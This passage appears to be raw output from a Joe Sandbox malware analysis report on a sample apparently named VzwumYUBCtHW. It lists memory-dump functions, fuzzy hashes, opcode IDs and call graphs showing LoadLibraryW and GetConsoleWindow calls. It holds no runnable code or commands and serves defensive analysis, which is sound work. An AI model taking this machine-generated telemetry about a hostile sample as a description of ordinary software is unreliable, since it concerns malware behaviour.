                      • Instruction Fuzzy Hash: 9FC08C300012088BC21167E6F60C3383778E700303F040060A229004688FBE2CC0E621
                      Function 04BEBE50 Relevance: .0, Instructions: 10COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0869c6a16c74dbb554557c2b8ecb654a60c096a2bfa443df079563123c21cefa
                      • Instruction ID: 8f279c24540ce90c9fbfe96d13cd8497dd1812eba831427254a2c308bac54598
                      • Opcode Fuzzy Hash: 0869c6a16c74dbb554557c2b8ecb654a60c096a2bfa443df079563123c21cefa
                      • Instruction Fuzzy Hash: 79C08C69518A84CFE3124F7894A1D603F70EF2B30430308E2D5804F063CE20283EC317
                      Function 04BE4B48 Relevance: .0, Instructions: 10COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b3d18153ff3a61677fd1ba50462592f1398827dedfb09aca51ebb19f1736e423
                      • Instruction ID: cff73a676ae5b3fdb2bdacad669307ef132c4d4ff0925a4cc0596ce7891a45ab
                      • Opcode Fuzzy Hash: b3d18153ff3a61677fd1ba50462592f1398827dedfb09aca51ebb19f1736e423
                      • Instruction Fuzzy Hash: 2AC04C3214410CBBDB02BE85DC01E59BF6ABB55794F148095FB040E161D773E563ABD4
                      Function 04BE0DB4 Relevance: .0, Instructions: 9COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5f531092826a4cd206a0885e42dab24ef641f9a4b83eac83874ead90f7eed10f
                      • Instruction ID: 542b8e713f201dc082d385cd8acc284b9ca15d977f6f95ce14f330ce176e9882
                      • Opcode Fuzzy Hash: 5f531092826a4cd206a0885e42dab24ef641f9a4b83eac83874ead90f7eed10f
                      • Instruction Fuzzy Hash: E1C02B35000000AED601B754C5C0D3BFAE0FFC2300780C8E1A14042030C770F818B712
                      Function 04BEA564 Relevance: .0, Instructions: 8COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5483bd84a0192a5f6905e06312a9fa702c4a6f828886f6748a15e194d8ae9163
                      • Instruction ID: 81558e29c019a619a506ff49ad74ef87c6dd4a7cdcc11c0c16a3f3c2b9902863
                      • Opcode Fuzzy Hash: 5483bd84a0192a5f6905e06312a9fa702c4a6f828886f6748a15e194d8ae9163
                      • Instruction Fuzzy Hash: AFB01239398209E1B80463E58981D3BE591EBF6704B40CD6573456102886A4F864A15F

                      Non-executed Functions

                      Function 04BE7780 Relevance: 10.1, Strings: 8, Instructions: 82COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                      • API String ID: 0-236026560
                      • Opcode ID: b533ee4b6d11a15df29a2c4660a147043ede0d505951b17c1089ddeb6232471e
                      • Instruction ID: 8c1abacb8c1d0806c8f751b09686ddb34ac654142a0d57a0d446a649f3a8e46d
                      • Opcode Fuzzy Hash: b533ee4b6d11a15df29a2c4660a147043ede0d505951b17c1089ddeb6232471e
                      • Instruction Fuzzy Hash: E4314A30A0011A8FCF08EFA5E9515DDB7F2FF84204B108969D0056B3A9DF346E4A8BA5
                      Function 04BE7790 Relevance: 10.1, Strings: 8, Instructions: 78COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.1841153931.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_4be0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                      • API String ID: 0-236026560
                      • Opcode ID: fec2401616b719472e6fb4bf9c27c29ba79fec7d4003cd6de6cf8ccac0230662
                      • Instruction ID: 177871175c500c82c56e0f5c813da5392ec0f18209253ae9a2d1e16ae5e0f015
                      • Opcode Fuzzy Hash: fec2401616b719472e6fb4bf9c27c29ba79fec7d4003cd6de6cf8ccac0230662
                      • Instruction Fuzzy Hash: F4310A30A0011A9FCF48EFA5E9515EDB7F2FF84704B108969D0057B3A8DF306E4A8BA5

                      Execution Graph

                      Execution Coverage:13.2%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:34
                      Total number of Limit Nodes:1
                      execution_graph 28672 66a6361 28673 66a62fc 28672->28673 28674 66a636a 28672->28674 28679 66a7398 28673->28679 28683 66a73f1 28673->28683 28687 66a7400 28673->28687 28675 66a631d 28680 66a738d 28679->28680 28680->28679 28681 66a7451 28680->28681 28691 66a6f98 28680->28691 28681->28675 28685 66a738d 28683->28685 28684 66a7451 28684->28675 28685->28683 28685->28684 28686 66a6f98 LoadLibraryW 28685->28686 28686->28684 28688 66a7448 28687->28688 28689 66a7451 28688->28689 28690 66a6f98 LoadLibraryW 28688->28690 28689->28675 28690->28689 28692 66a75f0 LoadLibraryW 28691->28692 28694 66a7665 28692->28694 28694->28681 28695 2ba0871 28699 2ba08d8 28695->28699 28704 2ba08c8 28695->28704 28696 2ba0889 28700 2ba08fa 28699->28700 28709 2ba0ce8 28700->28709 28713 2ba0ce0 28700->28713 28701 2ba093e 28701->28696 28705 2ba08fa 28704->28705 28707 2ba0ce8 GetConsoleWindow 28705->28707 28708 2ba0ce0 GetConsoleWindow 28705->28708 28706 2ba093e 28706->28696 28707->28706 28708->28706 28710 2ba0d26 GetConsoleWindow 28709->28710 28712 2ba0d56 28710->28712 28712->28701 28714 2ba0d26 GetConsoleWindow 28713->28714 28716 2ba0d56 28714->28716 28716->28701

                      Executed Functions

                      Function 066A75E8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2129 66a75e8-66a7630 2131 66a7638-66a7663 LoadLibraryW 2129->2131 2132 66a7632-66a7635 2129->2132 2133 66a766c-66a7689 2131->2133 2134 66a7665-66a766b 2131->2134 2132->2131 2134->2133
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,066A74A6), ref: 066A7656
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962755168.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66a0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 2518b2d74cce7ff6d59c2197a06a3bebb0157e58a88393ecdd0e1c13b4fd05fa
                      • Instruction ID: 0a9f9a692f5fbd101748abcb0773e336bbe794bff0a4d3c877769ecac56f1189
                      • Opcode Fuzzy Hash: 2518b2d74cce7ff6d59c2197a06a3bebb0157e58a88393ecdd0e1c13b4fd05fa
                      • Instruction Fuzzy Hash: DC1103B6D003498FCB10DF9AC444BDEFBF4AF88214F14842AD859A7711C375A546CFA5
                      Function 066A6F98 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2137 66a6f98-66a7630 2139 66a7638-66a7663 LoadLibraryW 2137->2139 2140 66a7632-66a7635 2137->2140 2141 66a766c-66a7689 2139->2141 2142 66a7665-66a766b 2139->2142 2140->2139 2142->2141
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,066A74A6), ref: 066A7656
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962755168.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66a0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 0d5cec3efa0c8666058a598bbec14fa64648b9ff4ad978f0e6d4f34dc05f0dc8
                      • Instruction ID: 1efbd5867821543aa4ed8be7418b4077a96bbde30ccedc37ccd759343a2961f6
                      • Opcode Fuzzy Hash: 0d5cec3efa0c8666058a598bbec14fa64648b9ff4ad978f0e6d4f34dc05f0dc8
                      • Instruction Fuzzy Hash: 7D1112B6D007498FCB10DF9AC444B9EFBF4AB88210F14842AD419B7310D775A945CFA5
                      Function 02BA0CE0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                      Download Yara Rule
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 02BA0D47
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1946260320.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_2ba0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID:
                      • API String ID: 2863861424-0
                      • Opcode ID: 7ad60fc116235b19b0bd7fec2dcf87ff282d359e3de70dfbc4a28fbe15b33d97
                      • Instruction ID: 9c258fd2977f9db67239d205715832a4b4723485383ea6655d70d76d6b01bf35
                      • Opcode Fuzzy Hash: 7ad60fc116235b19b0bd7fec2dcf87ff282d359e3de70dfbc4a28fbe15b33d97
                      • Instruction Fuzzy Hash: E41125B2D042498FCB20DFAAC4857DEFFF0AB88324F20885AC459A7250CB79A545CF95
                      Function 02BA0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 02BA0D47
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1946260320.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_2ba0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID:
                      • API String ID: 2863861424-0
                      • Opcode ID: 650953acb71b09f2cfc8ff20b566b26eca20b76e5d145847ebedd001b547349d
                      • Instruction ID: 80f4f465b6977eccc749b987992ecb60158797a0b754f455b4d2f0232829ac30
                      • Opcode Fuzzy Hash: 650953acb71b09f2cfc8ff20b566b26eca20b76e5d145847ebedd001b547349d
                      • Instruction Fuzzy Hash: 051106B29042498FCB20DFAAC5457DFFBF4EB88324F208859C559A7250CB75A544CFA5
                      Function 066F349D Relevance: 1.3, Instructions: 1280COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 62870ac2595f31d75e1e9168a66b28f500f335b02235e07cee315ddfc13bb6b0
                      • Instruction ID: 34cf33e31210576ef1c59c80aacd093e63cf734a511cd1ce2b3027bebc3892f9
                      • Opcode Fuzzy Hash: 62870ac2595f31d75e1e9168a66b28f500f335b02235e07cee315ddfc13bb6b0
                      • Instruction Fuzzy Hash: 58A1D474B102449FCB45DF78C854A6EBBF2EF89700B14846AE616DB3A2CB75DC06CB91
                      Function 066F19D0 Relevance: 1.0, Instructions: 1034COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 71573c15f325c065ee3e4fc4b31372a360b54d4acf3cc3a9d29f0ac6c3da2972
                      • Instruction ID: 213e20161c916d773752b7f0aa40b882a5f75da1e30f062e6cae8b2d9bed65e2
                      • Opcode Fuzzy Hash: 71573c15f325c065ee3e4fc4b31372a360b54d4acf3cc3a9d29f0ac6c3da2972
                      • Instruction Fuzzy Hash: 21925D74B006189FCB14DB54CD91BAEBBB6FF88700F108495E609AB3A4DB319E81DF91
                      Function 066F0048 Relevance: .7, Instructions: 664COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd06783495a8d7bbd082cda3c62ae1580d97541491726eab02585fa133d2e293
                      • Instruction ID: a2779a1cc92cfa62bbd25d38a80054cd14f8b44574cb13cc04faec36351c6156
                      • Opcode Fuzzy Hash: cd06783495a8d7bbd082cda3c62ae1580d97541491726eab02585fa133d2e293
                      • Instruction Fuzzy Hash: 44428C307506149FCB24EF68D850AAEBBF2FFC5705B10895CD5029B3A6CF75E9068B86
                      Function 066F19CF Relevance: .6, Instructions: 564COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf910b40da31b934dd56cdf1fb4656a6050f796666f28a6fab0917ec074cc97c
                      • Instruction ID: bfedcd102d81ddeb0a45dd0f7bd0b4e8de389421411a2221cc69ab234d621f51
                      • Opcode Fuzzy Hash: cf910b40da31b934dd56cdf1fb4656a6050f796666f28a6fab0917ec074cc97c
                      • Instruction Fuzzy Hash: CA229178B105188FC754DB18C991EAEB7B6FF88704F108485EA099B3A5DB71ED82CF91
                      Function 066F04F4 Relevance: .5, Instructions: 498COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9eb1ab72d5df1bb1bb696244e6fef1e1e5efbe1e67d8e27eec0022120dfd1b42
                      • Instruction ID: 875c6a48dfd1247f10392dda8dc080b7f792839ac38ad2798357f8a7579aeb18
                      • Opcode Fuzzy Hash: 9eb1ab72d5df1bb1bb696244e6fef1e1e5efbe1e67d8e27eec0022120dfd1b42
                      • Instruction Fuzzy Hash: 91127F30750614DFCB14EF68C860AAEBBF2FF85705F108959D5029F3A6CB75E9068B92
                      Function 066F056A Relevance: .5, Instructions: 463COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 40da0fda41b784f702c0cb4c4a21a7ba2566de15315cbd6aa0678ab2ba4f75d6
                      • Instruction ID: 213728f9ca60ed2e4c2465f2c517bcf7c0f867588dcf963812cd5b8b05fc6e43
                      • Opcode Fuzzy Hash: 40da0fda41b784f702c0cb4c4a21a7ba2566de15315cbd6aa0678ab2ba4f75d6
                      • Instruction Fuzzy Hash: CF028330750614DFCB10EF68C851AAEBBF2FF85704F108959D5029F3A6CB75E9468B92
                      Function 066F05E0 Relevance: .4, Instructions: 427COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a48b7747de63049f6c9eb260c7e3b0d7ce848c513524836ba17c22b460182d92
                      • Instruction ID: 93fe8dfea92565b64756bb8462460b83d270344019b455b74f6105a636c0d603
                      • Opcode Fuzzy Hash: a48b7747de63049f6c9eb260c7e3b0d7ce848c513524836ba17c22b460182d92
                      • Instruction Fuzzy Hash: 6B029230B50614DFCB10DF64C851AAEBBF2FF85704F108559D5029F3A6CB75E9468B92
                      Function 066F0656 Relevance: .4, Instructions: 389COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 924bffd80da4f58cb7903cda3ce5018cde46cc52f7d9fb000692c7a233449894
                      • Instruction ID: 93d6613bcea8171d141ecb541e3f52aef74507945d8c07fea776a5d61649f0cc
                      • Opcode Fuzzy Hash: 924bffd80da4f58cb7903cda3ce5018cde46cc52f7d9fb000692c7a233449894
                      • Instruction Fuzzy Hash: 34F1B030B50614DFDF00DF64C865AAEBBB2FF85704F108559E5029F3A6CBB1E9468B92
                      Function 066F1550 Relevance: .4, Instructions: 380COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 935b5cf8d5603e1e74f4c61bebec2feefeede9cadc8634908f933da4a11e5b02
                      • Instruction ID: 5ad1dfc2648664456627815bb494fcb669250d453fc0cd2f0be25ee3a7420d2a
                      • Opcode Fuzzy Hash: 935b5cf8d5603e1e74f4c61bebec2feefeede9cadc8634908f933da4a11e5b02
                      • Instruction Fuzzy Hash: 66E11A35B10604AFCB04DFA8C985E9DBBB2FF8A700F508095EA059F366CA72ED45DB51
                      Function 066F06CC Relevance: .4, Instructions: 355COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0b68c2ba51e32c24ef4e1cddba7c2d16ff21ff8723d2e18fdb7084fc40a5284f
                      • Instruction ID: e5b598331f70c454dc240db5dee2d44c0d1cd651ae5033d5c61462a8b07ade86
                      • Opcode Fuzzy Hash: 0b68c2ba51e32c24ef4e1cddba7c2d16ff21ff8723d2e18fdb7084fc40a5284f
                      • Instruction Fuzzy Hash: 5BE15E30B50618DFDB00DF64C965BAE7BB2FF85704F108459E6029F3A6CBB1D9468B92
                      Function 066F0000 Relevance: .3, Instructions: 342COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 423daef8e34d6ad90027c6088c779fda8c588bea4bea94cdd25ffd51de6dd8fd
                      • Instruction ID: ecd90c8979de93751820bcfce08f19ec51b55969d339d5709101aad78a7d197d
                      • Opcode Fuzzy Hash: 423daef8e34d6ad90027c6088c779fda8c588bea4bea94cdd25ffd51de6dd8fd
                      • Instruction Fuzzy Hash: 76D18E30B50244DFDB00DF64C965B6E7BB6BF89704F108096E611DB3A6CBB1D946CB92
                      Function 066F154F Relevance: .3, Instructions: 319COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 908f4cec56398713b580c46fd11f28899479d8a69254684af75b94ae6b3fd21b
                      • Instruction ID: 9290d2666e7c9eafcc7ee02cb40ee3545462f060cfcc17c3ec7de329c99d59d9
                      • Opcode Fuzzy Hash: 908f4cec56398713b580c46fd11f28899479d8a69254684af75b94ae6b3fd21b
                      • Instruction Fuzzy Hash: 27C12879B10504AFCB04DF98C985E9DBBB2FF89B00F508095FA05AB761CA72EC05DB55
                      Function 066F1534 Relevance: .3, Instructions: 283COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f990d6096b695bda2c26fb768773efac8d5026443266ca8503adb7de3efa80a
                      • Instruction ID: 57567a83990489ee3203a76f4f43245c9fa9ef73490a5399eca4a51b074201b3
                      • Opcode Fuzzy Hash: 4f990d6096b695bda2c26fb768773efac8d5026443266ca8503adb7de3efa80a
                      • Instruction Fuzzy Hash: 9DB11779B10504AFCB04DF98C985E9DBBB2FF8A700B608095FA019B761CB72EC05DB51
                      Function 066F1308 Relevance: .2, Instructions: 206COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 978856f9cca62310c2fda4bfe906929fe00b886549c02fb8ad6679f73c5d8639
                      • Instruction ID: 88cb680d00b26dcd80e1b4db8678222a187846f279fbe2ee25c8613eccf1e2bf
                      • Opcode Fuzzy Hash: 978856f9cca62310c2fda4bfe906929fe00b886549c02fb8ad6679f73c5d8639
                      • Instruction Fuzzy Hash: 12611532B14349CFCB149F7ED85046AFBA6AFC3294B18857ADA05CB311EB31D949C7A1
                      Function 066F338B Relevance: .1, Instructions: 78COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d7a94b312ee9ee10f461bf6ca4e7fc86fd2a4d8f57a11a49aaee5e5e59cc7edf
                      • Instruction ID: f0fbf0c0ba0c02d53b484bd11676acb4de146834acb004e99c7224a06efbe6e0
                      • Opcode Fuzzy Hash: d7a94b312ee9ee10f461bf6ca4e7fc86fd2a4d8f57a11a49aaee5e5e59cc7edf
                      • Instruction Fuzzy Hash: 31216B36B500049FCB54DF69C984EA9BBB2FF88714F5184A9EA059F3A5DA31EC05CB50
                      Function 00F7D054 Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1944771581.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_f7d000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3909cd4f09d57d2e4d119b45667f27c4f80f4cdaf183237dc6c9289bd820680d
                      • Instruction ID: 169b3e8c4708046e1f79f1f2c6b93e6233d08a25ac159cd01d795cc0d618a436
                      • Opcode Fuzzy Hash: 3909cd4f09d57d2e4d119b45667f27c4f80f4cdaf183237dc6c9289bd820680d
                      • Instruction Fuzzy Hash: 8C21F772500240DFDB15DF14D9C0B16BFB5FF88314FA4C26AE90D0A255C376D816DB62
                      Function 00F8D2F4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1944828862.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_f8d000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 47413d4c7a17152e58f7b0c441be5ca64ca29694c602e620c4b000f6a62c8ea1
                      • Instruction ID: efc03cfb5237b5122a75d5f003c1616184babc2361849fe05d14b2162d8be1dc
                      • Opcode Fuzzy Hash: 47413d4c7a17152e58f7b0c441be5ca64ca29694c602e620c4b000f6a62c8ea1
                      • Instruction Fuzzy Hash: DC213872604200DFDB00EF14D5C4B6ABB65FF94324F20C569D8494B286C33AD846EBA3
                      Function 00F8D4A4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1944828862.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_f8d000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 715964b57ef0fecc7715f840e66b16d9adffc01fe57099c3800458632ffeeccc
                      • Instruction ID: 177507754cd55e0427716f9cceeaf2047cba1d9e4193aecd9844febaf62db3ea
                      • Opcode Fuzzy Hash: 715964b57ef0fecc7715f840e66b16d9adffc01fe57099c3800458632ffeeccc
                      • Instruction Fuzzy Hash: 0A2146B1900204DFCB04EF14C9C0B66BBA5FF84328F24C56ED8094F292C73AD846EB62
                      Function 00F7D04F Relevance: .1, Instructions: 58COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1944771581.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_f7d000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                      • Instruction ID: 89dfbc10655a717b3f2b45daed87222bb6d22fc07ddbb5a04de99e6e135f7783
                      • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                      • Instruction Fuzzy Hash: 7021C072904280DFDB06CF00D9C4B16BF72FF88324F24C2AAD9480A256C33AD416DB92
                      Function 00F8D2EF Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1944828862.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_f8d000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                      • Instruction ID: 4add72f57f2ca1e4fdc4e179313d338b29f9fe2d05c749d15eb8dcb48a058759
                      • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                      • Instruction Fuzzy Hash: 4F11E275904280CFCB01DF10D5C4B59FF61FB84324F24C6AAD8494B686C33AD80ADBA2
